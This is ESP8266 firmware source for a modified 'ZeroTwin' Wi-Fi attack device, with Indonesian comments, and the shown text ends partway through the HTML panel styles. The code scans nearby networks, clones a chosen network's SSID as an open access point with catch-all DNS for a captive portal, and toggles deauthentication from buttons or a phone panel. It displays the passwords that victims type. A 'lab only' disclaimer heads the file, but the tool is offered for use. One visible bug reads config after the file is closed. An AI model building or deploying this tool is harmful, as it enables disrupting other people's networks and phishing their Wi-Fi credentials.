// ============================================================================
// ZEROTWIN MODIFIED — evil twin + deauther + tombol fisik + monitor HP
// Base: ZeroTwin v1.0 (github.com/shinyxn) — logika deauth & evil-twin asli
// dipertahankan. Yang diubah:
//   1. tombol fisik (ADC A0 resistor ladder ATAU pin digital) + debounce
//   2. delay() di setup dihapus -> web langsung siap, OLED digambar non-blocking
//   3. /api/status + baris monitoring di panel HP
// Hanya untuk lab/jaringan milik sendiri.
// ============================================================================
#include <Arduino.h>
#include <ESP8266WiFi.h>
#include <DNSServer.h>
#include <ESP8266WebServer.h>
#include <SPI.h>
#include <Wire.h>
#include <Adafruit_GFX.h>
#include <Adafruit_SSD1306.h>
#include <Fonts/Picopixel.h>
#include <LittleFS.h>

extern "C" {
#include "user_interface.h"
}

/* AP kontrol (default; bisa diubah dari panel HP, disimpan di LittleFS) */
#define AP_SSID_DEFAULT "ZeroTwin v1.0"
#define AP_PASS_DEFAULT "zero8888"
#define AP_CFG_PATH     "/zt_ap.txt"
char apSsid[33] = AP_SSID_DEFAULT;
char apPass[33] = AP_PASS_DEFAULT;

/* OLED */
#define SCREEN_WIDTH  128
#define SCREEN_HEIGHT 64
Adafruit_SSD1306 display(SCREEN_WIDTH, SCREEN_HEIGHT, &Wire, -1);

/* Tombol fisik: 0 = ADC A0 (rangkain resistor), 1 = pin digital INPUT_PULLUP */
#define BTN_ADC       0
#define BTN_PIN       A0
#define BTN_ENABLED   1

const unsigned char zeroTwinBoot [] PROGMEM = {
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x20, 0x00, 0x00, 0x00, 0x07, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xc0, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xc0, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x01, 0xc0, 0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x02, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x06, 0x80, 0x00, 0x00, 0x01, 0x03, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x05, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x0d, 0x00, 0x00, 0x00, 0x01, 0x03, 0xff, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x0c, 0x00, 0x00, 0x01, 0x01, 0x03, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1c, 0x00, 0x00, 0x00, 0x07, 0x23, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1e, 0x00, 0x00, 0x00, 0x1e, 0xc3, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3e, 0x00, 0x30, 0x00, 0xff, 0xc3, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0x00, 0x70, 0x03, 0xff, 0xc3, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xd0, 0x70, 0x0f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xf8, 0x30, 0x1f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xf8, 0x30, 0x1f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xf8, 0x10, 0x0f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfc, 0x00, 0x0f, 0xff, 0xc3, 0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x0f, 0xff, 0x83, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x07, 0xff, 0x81, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x07, 0xff, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x03, 0xfc, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x01, 0xff, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x01, 0xfe, 0x00, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x04, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x40, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x00, 0x11, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x00, 0x00, 0x20, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfc, 0x00, 0x0f, 0xf8, 0x60, 0x7f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfc, 0x00, 0x3f, 0xfc, 0xea, 0x3f, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfe, 0x00, 0x7f, 0xfd, 0xcd, 0xdf, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x7f, 0xfe, 0x00, 0xff, 0xff, 0xdf, 0x9f, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xfc, 0x00, 0xff, 0xff, 0xff, 0xbf, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xfc, 0x00, 0xff, 0xff, 0xff, 0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x3f, 0xfc, 0x00, 0xff, 0xff, 0x7f, 0xdf, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1f, 0xf4, 0x00, 0xff, 0xff, 0x3f, 0xdf, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1f, 0xf0, 0x00, 0xff, 0xff, 0x8f, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x1f, 0xf0, 0x00, 0x7f, 0xff, 0x87, 0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x0f, 0xe0, 0x00, 0x7f, 0xff, 0x83, 0xff, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x07, 0xe0, 0x00, 0x7f, 0xff, 0x83, 0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x07, 0xe0, 0x00, 0x3f, 0xff, 0x83, 0xe7, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x03, 0xe0, 0x00, 0x3f, 0xff, 0x83, 0xf7, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x01, 0xe0, 0x00, 0x1f, 0xff, 0x83, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xe0, 0x00, 0x0f, 0xff, 0x81, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0xe0, 0x00, 0x0f, 0xff, 0x80, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x40, 0x00, 0x0f, 0xff, 0x80, 0x7e, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x0f, 0xff, 0x80, 0x3c, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x0f, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x07, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x03, 0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0x00, 0x00, 0x00, 0x03, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};

const unsigned char zeroTwinIcon [] PROGMEM = {
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xf8, 0x00, 0x1f, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfe, 0x00, 0x00, 0x00, 0x7f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x0f, 0xff, 0xfc, 0x00, 0x00, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x03, 0xff, 0xff, 0xff, 0xc0, 0x00, 0x3f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x0f, 0xff, 0xff, 0xff, 0xfc, 0x00, 0x1f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfc, 0x1f, 0xff, 0xff, 0xff, 0xff, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf8, 0x7f, 0xff, 0xff, 0xff, 0xff, 0xe0, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xc1, 0xff, 0xff, 0xff, 0xff, 0xff, 0xf8, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xc0, 0xff, 0xff, 0xff, 0xff, 0xff, 0xfe, 0x03, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xc0, 0x0f, 0xff, 0xff, 0xff, 0xff, 0xec, 0x07, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xe0, 0x01, 0xff, 0xff, 0xff, 0xfe, 0x00, 0x0f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf0, 0x00, 0x0f, 0xff, 0xff, 0xf0, 0x00, 0x7f, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x3f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf0, 0x00, 0x00, 0x00, 0x01, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xfe, 0x00, 0x00, 0x0f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xff, 0x00, 0x00, 0x7f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xfe, 0x00, 0x00, 0x1f, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xf8, 0x00, 0x00, 0x07, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xf0, 0x00, 0x00, 0x03, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0xc0, 0x00, 0x00, 0x01, 0xfe, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0x80, 0x00, 0x00, 0x00, 0x7c, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x71, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfe, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xfc, 0x00, 0x00, 0x00, 0x00, 0x1f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf8, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xf0, 0x00, 0x00, 0x00, 0x00, 0x0f, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x00, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x00, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x07, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x01, 0x00, 0x01, 0x00, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x10, 0x00, 0x01, 0x80, 0x03, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0xc0, 0x10, 0x00, 0x01, 0x80, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x10, 0x00, 0x01, 0x80, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x18, 0x00, 0x11, 0xc0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x38, 0x04, 0x18, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x30, 0x04, 0x3f, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x00, 0x3c, 0x7e, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x0c, 0x3f, 0xfe, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x18, 0x1f, 0xfc, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x80, 0x18, 0x1f, 0xfc, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x18, 0x3f, 0xfe, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x0c, 0x3f, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x0f, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfe, 0x00, 0x07, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfc, 0x00, 0x07, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xfc, 0x00, 0x03, 0xff, 0xff, 0xe0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf8, 0x00, 0x03, 0xfe, 0xff, 0xc0, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xf3, 0x00, 0x01, 0xff, 0xff, 0x80, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xe7, 0x00, 0x00, 0x3f, 0xfe, 0x00, 0x01, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xef, 0x00, 0x00, 0x0f, 0xf0, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x00, 0x60, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x03, 0xe0, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
	0xff, 0x00, 0x00, 0x03, 0xe0, 0x00, 0x00, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
// ---------------- state ------------------------------------------------------
typedef struct {
  String  ssid;
  uint8_t ch;
  uint8_t bssid[6];
  uint8_t rssi;
} _Network;

const byte DNS_PORT = 53;
IPAddress  apIP(192, 168, 4, 1);
DNSServer  dnsServer;
ESP8266WebServer webServer(80);

_Network _networks[16];
_Network _selectedNetwork;

bool hotspot_active  = false;
bool deauthing_active = false;
bool deauthAll = false;      // true = putar semua AP hasil scan
uint8_t rrIdx = 0;           // penunjuk round-robin untuk mode "semua"
int8_t singleIdx = -1;       // >=0 = mode tunggal: hanya BSSID indeks ini

String _correct     = "";
String _tryPassword = "";
String lastEvent    = "boot";
String twinSsid     = "";      // SSID yang benar-benar dipancarkan saat twin aktif
bool   twinSimilar  = false;   // true = nama kembaran pakai akhiran (mis. " 5G")
String twinSuffix   = "5G";    // akhiran nama; kosong = clone persis

unsigned long now = 0, wifinow = 0, deauth_now = 0, oled_now = 0;
unsigned long sentFrames = 0;

int  btnRaw = 0, btnLastVal = 0, btnCand = -1, btnCandCnt = 0;
const char* btnLast = "-";

// ---------------- util -------------------------------------------------------
String bytesToStr(const uint8_t* b, uint32_t size){
  String str;
  for(uint32_t i = 0; i < size; i++){
    if(b[i] < 0x10) str += '0';
    str += String(b[i], HEX);
    if(i < size - 1) str += ':';
  }
  return str;
}

void loadApCfg(){
  File f = LittleFS.open(AP_CFG_PATH, "r");
  if(!f) return;
  String ss = f.readStringUntil('\n'); ss.trim();
  String pp = f.readStringUntil('\n'); pp.trim();
  f.close();
  String sf = f.readStringUntil('\n'); sf.trim();
  if(ss.length() >= 1 && ss.length() <= 32) ss.toCharArray(apSsid, sizeof(apSsid));
  if(pp.length() == 0 || pp.length() >= 8)  pp.toCharArray(apPass, sizeof(apPass));
  if(sf.length() <= 8) twinSuffix = sf;
}

void saveApCfg(){
  File f = LittleFS.open(AP_CFG_PATH, "w");
  if(!f) return;
  f.println(apSsid);
  f.println(apPass);
  f.println(twinSuffix);
  f.close();
}

// Terapkan SSID/password baru ke AP kontrol; twin yang aktif tidak diganggu.
void applyApCfg(){
  if(hotspot_active) return;
  WiFi.softAPdisconnect(true);
  if(strlen(apPass) >= 8) WiFi.softAP(apSsid, apPass);
  else                    WiFi.softAP(apSsid);
  dnsServer.start(53, "*", IPAddress(192,168,4,1));
}

void clearArray(){
  for(int i = 0; i < 16; i++) _networks[i] = _Network();
}

void performScan(){
  int n = WiFi.scanNetworks();
  clearArray();
  if(n > 0){
    for(int i = 0; i < n && i < 16; i++){
      _Network net;
      net.ssid = WiFi.SSID(i);
      net.rssi = WiFi.RSSI(i);
      net.ch   = WiFi.channel(i);
      const uint8_t* b = WiFi.BSSID(i);
      if(b) memcpy(net.bssid, b, 6);
      _networks[i] = net;
    }
  }
  WiFi.scanDelete();
}

// ---------------- OLED status (non-blocking) --------------------------------
void oledStatus(const String& ev){
  if(ev.length()) lastEvent = ev;
  display.clearDisplay();
  display.setFont();
  display.setTextSize(1);
  display.setTextColor(WHITE);
  display.setCursor(0, 0);  display.print("Zer0Twin  "); display.print(millis()/1000); display.println("s");
  display.setCursor(0, 8);  display.print("AP : "); display.println(apSsid);
  display.setCursor(0, 16); display.print("Tgt: "); display.println(_selectedNetwork.ssid.length() ? _selectedNetwork.ssid : String("-"));
  display.setCursor(0, 24); display.print("D:"); display.print(deauthing_active ? "ON " : "off");
  display.print("  T:"); display.println(hotspot_active ? "ON" : "off");
  display.setCursor(0, 32); display.print("Pkt: "); display.println(sentFrames);
  display.setCursor(0, 40); display.print("Pass: "); display.println(_tryPassword.length() ? _tryPassword : String("-"));
  display.setCursor(0, 48); display.print("Btn: "); display.print(btnLast); display.print(" raw="); display.println(btnRaw);
  display.setCursor(0, 56); display.println(ev);
  display.display();
}

// ---------------- tombol fisik ----------------------------------------------
int readButton(){
#if BTN_ADC
  int v = analogRead(BTN_PIN);
  btnRaw = v;
  if(v > 1000) return 0;
  if(v > 750)  return 1;
  if(v > 550)  return 2;
  if(v > 350)  return 3;
  if(v > 150)  return 4;
  return 5;
#else
  int v = digitalRead(BTN_PIN);
  btnRaw = v;
  return v == LOW ? 1 : 0;
#endif
}

void startHotspot(bool similar = false){
  if(_selectedNetwork.ssid.length() == 0) return;
  twinSimilar = similar;
  twinSsid = _selectedNetwork.ssid;
  if(similar && twinSuffix.length()) twinSsid += " " + twinSuffix;   // mis. "NAMA 5G"
  dnsServer.stop();
  WiFi.softAPdisconnect(true);
  WiFi.softAPConfig(IPAddress(192,168,4,1), IPAddress(192,168,4,1), IPAddress(255,255,255,0));
  WiFi.softAP(twinSsid.c_str());
  dnsServer.start(53, "*", IPAddress(192,168,4,1));
  hotspot_active = true;
  oledStatus("twin ON: " + twinSsid);
}

void stopHotspot(){
  hotspot_active = false;
  dnsServer.stop();
  WiFi.softAPdisconnect(true);
  WiFi.softAPConfig(IPAddress(192,168,4,1), IPAddress(192,168,4,1), IPAddress(255,255,255,0));
  WiFi.softAP(apSsid, apPass);
  dnsServer.start(53, "*", IPAddress(192,168,4,1));
  oledStatus("twin off");
}

void stopAll(){
  deauthing_active = false;
  wifi_set_channel(hotspot_active ? _selectedNetwork.ch : 1);
  if(hotspot_active) stopHotspot();
  oledStatus("semua stop");
}

void handleButtons(){
#if BTN_ENABLED
  int b = readButton();
  if(b != btnCand){ btnCand = b; btnCandCnt = 0; return; }
  if(btnCandCnt < 5){ btnCandCnt++; return; }     // wajib stabil ~25 ms
  if(b == 0){ btnLastVal = 0; return; }
  if(b == btnLastVal) return;
  btnLastVal = b;

  if(b == 1){
    btnLast = "UP";
    for(int i = 0; i < 15; i++){
      if(_networks[(i+1) % 16].ssid.length() && _networks[i].ssid == _selectedNetwork.ssid){
        _selectedNetwork = _networks[(i+1) % 16]; break;
      }
    }
    if(_selectedNetwork.ssid.length() == 0 && _networks[0].ssid.length()) _selectedNetwork = _networks[0];
    oledStatus("target: " + _selectedNetwork.ssid);
  } else if(b == 2){
    btnLast = "DOWN";
    performScan();
    oledStatus("scan ulang");
  } else if(b == 3){
    btnLast = "OK";
    deauthing_active = !deauthing_active;
    oledStatus(deauthing_active ? "deauth ON" : "deauth off");
  } else if(b == 4){
    btnLast = "BACK";
    hotspot_active ? stopHotspot() : startHotspot();
  } else {
    btnLast = "EXTRA";
    stopAll();
  }
  oled_now = 0;
#endif
}

// ---------------- halaman ---------------------------------------------------
const char PANEL_HEAD[] PROGMEM = R"HTML(
<html><head><meta name='viewport' content='initial-scale=1.0, width=device-width'>
<title>ZeroTwin</title><style>
body{background:#1a1a1a;color:#bfbfbf;font-family:sans-serif;margin:0}
.content{max-width:800px;margin:auto;padding:.5em}
table{border-collapse:collapse;width:100%}
th,td{padding:8px 6px;text-align:left;border:solid rgb(204,12,207) 1px;font-size:.85em}
button{height:34px;padding:0 14px;color:#fff;font-size:11px;font-weight:600;letter-spacing:.1rem;
